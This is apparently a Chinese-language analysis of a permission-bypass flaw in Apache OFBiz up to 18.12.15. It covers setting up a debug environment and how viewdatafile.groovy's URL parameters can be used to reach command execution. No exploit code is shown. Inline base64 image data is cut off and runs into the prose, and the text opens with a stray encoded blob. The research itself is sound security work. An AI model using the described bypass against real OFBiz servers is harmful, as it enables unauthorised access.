6Zmljzlt0/7UschZY1oMe+eJ0/3iQiQVJLJJj9mOBrzVM2cVpljTHpqe4805yZpD30vhcA8HeXm7fn7lpJxJzBt7wMJffmcDAR9Nn6wn29nHrXhJyaaIrPd7oMN0D1ew6UEF79wizsXLKq9m2zWDkw9EVGNJzRMenCTWW47w1RiZYRpU/TmQqwFIz5WV1AZzJLBlfkHA5TNpFkWKuV1jNcp49ZjHtQFk/VmvcyBLrOc1bf9BH6pf/Bc///Je5/dvfY2DRMYtNt3Iq6htxjn/C+++epf/hD6cUyYwx7aWqrpzs2F3u9Uby6tbEBEnjAG111XjH+1nd4GFrRy6XJR6PzxomhQiHwwWMFYsfn07y42XOU+03cExneK8rR3upmZ3Fx/5nT1I2/BZ/+uEDbsQAVpasBdnMp2VL6jg9996gZ6OzsZnIxRkdGJhVxPv7Y3i+9Fn27q7jxtmBDc3aHHHuf/Aa9z8V511B/yWHlQXrgVPJWaL9EcaW6+IT00TDYWqr+4ksNT2STTHVJ2pXjqoc+KNxxvqWkKoSCcb78qN8jQXZaGxxuqKPl2Hg2jitn69hW+0od4cswKBiXxXB6Ci3O0sbu3JDMaK7ywibY0SayvH1RumvDFC+KKWbcJ2bVNcok21VhOpMmLKds5jrFVaznOeupoh2oKwfqzxuZHr44LWfcOyXXuT43td4/WaBNl9suhWQSibA48X90EdSVoLTBLKGD68HEgOxedPEOWKxOFT78BiQ2CJ9PpvNYuVys/6ohZAYxLM0OPnjz5hzKkcqy2/8IMNN2+9cTjABt8MCw8DtBIkhkc1CuqRy2k7LDheTpy8xtOzvM2SzD1KmvTS0vsqzO3ZR7fdjZqKMT1znk6s/5G5sfkc18Iaf4Jl9J9geCuPOjtPf/wE/uXmZcVt/9oSOcnLfU+wIVeCxooyNXuaTGz+hc3rObGg8+Ct8ve4K//WdtxiSD2u+yv/8ZBPn3vt3nBG5J/QS//2zR7h//m/IbX+Vg2E/mWwf7fd/TKflxGLG9zh8nC/uaJl32fc5c+UCC8S5sqN8blfbvIVex3jp6LHZd/3t3+XyBGDUceixZ6mZ/IB3uwbnfKWNXbz08jdp6v4O/+lGT0kuEr7Gw7x4pI0Kd4ZcMkL73XaiC6wpB4GaFrbVV1Dmc0E2xfTkEN2d/UzNNJa8Uu2k5cBxtteHcZsGjmySyeFOrl24RE9kGfUqO8boJLQGg3iAZP7i8FS2cejwLurDAVzZGCPdN7l0pXOhXVFxiC+91Er/qbPkdh5hR5WHbHyMzivnuNobyxuGzlae+9oBpq/3U7l7O87Bi5y6X84TT7Xhi3Ry5sMLDCRnjtf0JP/g6e1z/Sh5jx+/dp7Fez+6qdp9hMd31xP2e3BkE0RGe5a43iLTFX1eA0/VTg4f2kVd2I8zHWOs/zaXr7QzMW+iQtx4Pj6XZeeRNirdGaIjXVw5f4X+uL2lrKT/WuRyrI4/dzbCaH8NDa1B7o0s0lM3lFz/MD1jFbQcDNMxNE7GU0HzTifjZ4eJlHjpZirGcGQblbUmrm0+xu4OQu0SCV1BwpUwdXOEqXAVO+qDGHcmS3eBWpNyXsV2UATVR36KFxu7ePvNy8zO3dV/hq89V8nN7/+QG7OSe7H9chXHlxVRXP8Fk7Jthzj6
<p blockindex=4>虽然添加了权限的校验,但是模板覆写导致端点不同导致权限绕过的问题还是可能存在的</p>
<h2 blockindex=5>二、影响版本</h2>
<p blockindex=6>ofbiz≤18.12.15</p>
<h2 blockindex=7>三、环境搭建</h2>
<p blockindex=8><a href=https://codeload.github.com/apache/ofbiz-framework/zip/refs/tags/release18.12.15>https://codeload.github.com/apache/ofbiz-framework/zip/refs/tags/release18.12.15</a> 下载源码</p>
<p blockindex=9>idea打开之后,配置gradle,执行下面的build得到jar包</p>
<p blockindex=10><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAARgAAAElCAYAAAA/av3/AAAACXBIWXMAAA7EAAAOxAGVKw4bAAAgAElEQVR4nO29a2xc55nn+XvPpW4kRYli0XI6tmT6RtJOx+nYsWcSUuo00sl0xplecWmkB50B5oNGowF20DMfdgGtFxoBhoAFBhj0fhitWtgP04OZXUQrJm1vN6anJ90i2c7ETpTYnZhknFi25ZvMQ4l3si7nsh/OqSvrcopkkVXk8wMEserc3lNV53+e53nf8/7VV07+tofQkiR7DmPdW9zrZrQ88jk1D/0P/hfUgwP51/b//k8rvlcNJQLTusiFEw75nFoXba8bIAjC/kUEpoWRu3I45HNqXURgBEFoGiIwgiA0DREYQRCahgiMIAhNw1hfWdrrNgiCsE8xEl3de90GQRD2KZIiCYLQNERgBEFoGiIwgiA0DREYQRCahgiMIAhNw9jrBjRC733HePjxJ4hGI9z5+EN+PfsWruPudbMEQaiC/uCJh/7NXjciLA8+9DArS4usri7z8GODdHUf5pMPP9j+jpPDnPvXf8g3R4YZYpb1p/+IfzECMzdvs1Zjs6HR86HWE4SDSstEMJqm0dPbS3dPL5qm4bouq0uL3LXmsG0bgNlfvFnYwPN4/MnPk+h4g/W17VzeA4ydHYbJq1yctAAYGg2zXZK+3m0cVhAOAHUFpu++Pr7xu1/n5ZdfYXGp8mPx/f39PPulZ/ne979HKpVquBEnHnmcRwaeIBqLblrm2DYf3n6PW7+cYX1tNf++6/qpUbyjc3sCk0zSi8XMjNXghhY3rlzixtaPLAj7nrpF3o5EJz09PbzwwhiHuw9vWt7f38+3nn+erq7OigIRhgcf6q+6rW4YHO9/hFNf/4d84dkvc/9vPMDx/kd5ZPAJgBLR2RK9Sfq2twdBEKoQasrMnIisr6/z3e9ey0cy1d4Pf3TF44NPksmkGXrqi/m306kNbNuho7MTgKWFeywvLfLAif6Szec/vcNrU39Tff/JYc6dHS4RkOnrl7g24/89NHqescHiDSwmrlxlbuQ8Y71TXB6H0eLtZ8a5eH02v/bQaLDelSnmBk9zYXSAcuYmr3J5stHoSBD2B6GKvAsLC8xZFk8++SSPPfYY77xzi8/8xme2Jy7AE5//LfoHhlhZXkYpjVg8jnXnE95/51fc95nPous6ALFYjEgkihmJ5LfNZjPc/O9TZDOZyjsfPM2F73yR969f4t+PTzExOcXEDJz8zh/yDLP85P11rJkpJqwkp4Y8Jq78Mf/hv/yU99YhOTTME8eP88zx2/zpv/tP/EWw7dA3vpHfFoL1Erf5yc3brM3P+McI/lnJYZ5gij8dn5ECsHBgCT0O5tatW7z8yiskEgm+/e0Xti0u3Ud6OP7I4wA89Mhj3PnoNj+/+Trra6t87otfwoyYhZWVIt7RkX9pZ7Pc/OEUaysrVfY+wNjoAHOTV/PRCgDWFNcnLfpGhhmq28JZrl2ZYm4r2w6eZmzQYmK8aHtBOIA0NNAuJzKxWHxb4gLw6NDnUMr/W2kaA597is998Uscf/jRmtulNjb44Y2/4q5V49JNJukF5q3NqcmcdRc4Sl+yTgMti/ktbZsTt+9zQzIj4YDTcDf1rVu3+P6fvcziwsKWxUXTdZJ9xxreznFcXv/bv2FlqXXnsBkaPc0Qs1yTuosgbO1Rgffee3fL4gLQ0dGJpjd+6I/efzecuATRR29yc6jRlzwK3GWu3vUfREHFDA0NgDXLdLVtB08zNgjT18eZrt9KQdj37MmzSLpplrzeWF/HceyS91zbIbVeWh6983HYUbuzTExa9I2cKe0lGjzNuZFkSAHwU53ibccGYXqyWl0lWH9mvLTuIwgHmD0Zyetks/4fnsdPX/shn3x4m0g0xnMjX6Wru5u1lRV+NPHfSKVS3PeZz/L03/sKKMXqcvioaW7yKhet01wYPc+F/LsWE1cuhauNWFNcs4a58OLp/FvFXdzl+KkRfu/Vi0ULyrq2BeEgsSfWsbpu8PTfHyaV2uDNH/8o/37fsc/Q/9gg773zS+589GH+/Se/8DQdnV38+NWJ/AheQRBaH/GmFgShach8MIIgNA0RGEEQmoYIjCAITUMERhCEpiECIwhC0xCBEQShaYjACILQNERgBEFoGiIwgiA0jZZxFdhJPnu8n3hHouQ9O5Ph0zufsL5abZIqQRB2mn0qMA9xtG/zVN6DrsvsL97k1tvy8KEg7AYHKkVSmsbgb36BRwbqT5i5lwyNnq84gbggtBv7MoKpx+NPfp7Hn/x8zXXuzs3xo8kfbHq/b+QM50aqz5kpLgKCUGDPBGY3DN2awdzkVS5OBi8GT3Nh9CgTV67K/LuCUIE9S5F2w9BNEIS9Zc8imHff9R0KvvX887zwwlhNQ7elJk/ybWezrK2u4HkunV3dGGVTem6NJKfOnuFkPpua5dpLxVN1DjD24um8BUrt2fJ8g7hC+hV+W0HYS/a0BpOzQSkWmZ6jPdv2XArL8uIib7/1JnN3PsHz/Hm3lILkfZ8heV/jrgfF9I0Mw/glLlqQE5uxs8O+C2QgEL2TV7kY1GuGRobpm9k8329uXuGCiITfVhD2mj0v8haLzLe//cKOeC6F4c5HH/LG66/iOC4q3oHxz/8tAM6f/M/M3fmYuTsfb2v/c5PjRRe8xY3JWU6O+k4FcxV8m6YnpzbvJJikvMRALuy2gtACtEQ39U4auoVheXGRN15/FffIZ0Ap1OCzEIlBJIYafC4IYx7Y9nGGRs9z4cXgX3G3szXLjBUsL/POztM7zLnAnbKkVyrMtoLQIoTypt4NFhYWuPPpHDdv3ty2uHz2eD+JIqvZcn5+8zVWe4+j/+H/ivbUKdTAl/LLVP/n0J46hfbsP8D79H24d6f6gZKDnBpK8P5N39O6wABjL/4zTiVnufbSn/D/TuY8sGF6cgaLdd67GfhdjwxzamSYU4Mwc/M2a+Q8r9dZ6+igL7Gef9+n9raC0Eq0RASTY7uGbmGws1nm7nyCur/ff6OjG29lEff/+xOcV/5PWLkHHd0AhXUaZXCIISwmrhSKur7hWxnWFJdfuuTbmiSHOVns4TQ/5ddrkn4k09C2gtAitJTA7AZ+b5GH++qf4f36ZwC4E9dw3/rveNOv4fzNdwHw3nkTd2p8G0dKksxZQyaHGS0enJccZmzTYD0Lq9wM2wpEZvB0IcUKu60gtAB7XuTdl8yMc3nyDOdypm/WFJevz3JuNFhuTfHWyPkigzar+mA9a4rL15NcGD3NhbO+4ITeVhD2mH3pi3To8BHMKmNZXMdh4d5dtC//I7Sv/D4A3soi3sR38TwX/dQL0NXjr/vDV7YZxQjCwWZfRjDLiwt11/E+ueX/sbaE6jqM+of/rLBwbcmvzeTWEQRhS+zLCCYsqvezeHc/QvvCb6N97TsAuD/4z7g3/xv0fhasD/a4hYLQ3hy4Im8x3vyH4Hl4M69BJgWZFN7Mj8DzRFwEYQc40BGMIAjN5UBHMIIgNBcRGEEQmoYIjCAITUMERhCEpiECIwhC0xCBEQShaezLkbzNQgzdBKExRGAaQAzdBKEx9nWK1HdfH/0PPdT047SLoVs55bPi7dYseTIb38Fh30YwSsE3fvfr9PT08PIrr3DrVvMfXNyOodvek6Svt/5a7XMcoRXYtxGM58HLL7/C+vo633r+efr7tzg73YHB4saVS1y8spPuBAOMvehbrjT3OEKrsm8FBmBxaZHvfveaiIwg7BH7NkXKkROZF14Y41vPP79r6RJsxdCttlnb0Oh5xnqnuDwOo8U1jJlxf27eBtcrJ79dSXRRavKWn8azTntLPLyDmf1yDgkVj5Mc5lxZXabUUC441vw4l63hIn/wckM7oZXY9wIDBZH59rdf4FvPP8/3/+xl3nvv3aYdb6uGbrXN2gKSw5w77U/4PZd7ffY0F0bLxCPserUI5gKeKzJ5I+m7GMzN1Gnv5FUuTvriRD3nyeA409cvcTnv/zTMubPnOVdu2zJ4mlHrKhdfKjhcjo0OhD8nYV
<p blockindex=11>最后执行数据导入,在下载的文件夹的根目录执行gradlew loadAll</p>
<p blockindex=12>开始调试即可</p>
<h2 blockindex=13>四、漏洞原理分析</h2>
<p blockindex=14>对于权限的绕过,在<a href=https://forum.butian.net/article/524>https://forum.butian.net/article/524</a> 以及描述的很清楚了,主要就是两个函数收到的不同端点来处理业务</p>
<p blockindex=15>这里分析一下viewdatafile.groovy这个文件是如何替代ProgramExport和EntitySQLProcessor来执行命令的</p>
<p blockindex=16><img src="data:image/png;base64,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
首先接收DATAFILE_SAVE,ENTITYXML_FILE_SAVE,DATAFILE_LOCATION,DEFINITION_LOCATION,DEFINITION_NAME,DATAFILE_IS_URLDEFINITION_IS_URL这些参数</p>
<p blockindex=17>然后根据dataFileIsUrl和definitionIsUrl这两个参数的值是否为true,来设置dataFileUrl和definitionUrl为URL类型的值</p>
<p blockindex=18><img src=data:image/png;base64,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
<p blockindex=19>如果definitionUrl有值,则进入getModelDataFileReader方法</p>
<p blockindex=20><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAA3oAAAD/CAYAAACnxqSOAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAgAElEQVR4nOy9d3Rlx32g+dUNLwe8iAw00EAD6BzZgWySTTbZzBJJyTIVrLFkj732eNbrWYfZHe/4zJ79Y33s9TiNRUsajyitZEm0AqMoUpSYxNAkO7MbHdGNnPEeXr73Vu0f7wENdCIti5LWvB8P2Ad499arqlv1q/qlukIppTZvvY6fF47jEI2EmJqcRNO0n1s9XFxcXFxcXFxcXN4rUkqam5sZHR39eVfFxQWAo0ePLvvd+DnV4xcCIQRKqat+rpTEkWDqGkuvko6NZTu1MjSUkrUCNUzTAMdBGAYa1O5TOLZEM3TE+9QWFxcXFxcXFxcXFxeXBT6gip5CCYOQT2e+WLmi8iWUQ13LGnqSZfYfOreo6EkH6jvX0hr1YAuBLxjFKWawHPAGfAwfP0Ip3kYwO8SFqXlQCs2sY92Wek682Y+DQAhX3XNxcXFxcXFxcXFxef/4YCp6ngQ37rkOffQYzx24gKFfqngpLKOO7rRgLBujOTbCwEwJXQhQGrrhcGL/m8wg6Nh+G8XjbzOadUj1bCXtFQyfO0HTji30eGZoXtuFrgSmR6dxbzt2eYJXXzhIRXfDVF1cXFxcXFxcXFxc3h8+eIqeUsTDcOC1A6xtMuBSf56SCF+c7VtXM3BoP9MFjVUb1tEkDzIyayFQCM1P7+ZNlIVGJO7DXr2RZksRjMWY6PfQt2k9ufMnODc0Rf/IGTRPgs07Wzj4wiFsAE1zQzhdXFxcXFxcXFxcXN43PniKnhBMT03hizYggEsz9DzRelZ1tjP41nPY9dvY1DTJ6wdPsGn9GoQ4wfBUBSEqnDp8jBml0bE9SaH/COPzkmTXJhJUeOfNV2lb0Uyyvh6f1wNaCL8ZoqmlGakgMzNJrmhfpmO6uLi4uLi4uLi4uLj8NPjgKXrXQDd99NT7eefw20jpo05JHKXQVY6jR46RaO8lVTmLYfpJNzXhR6POZxBIN2GEJdE6P04ehO4hURfm9PgY8wqauxvI9B9jeLSAaerYluMqeS4uLi4uLi4uLi4u7xsfyESxBU+eYrm+5VSKHOw/j1QLn9Y+V4B0mDp7iImCRdDro6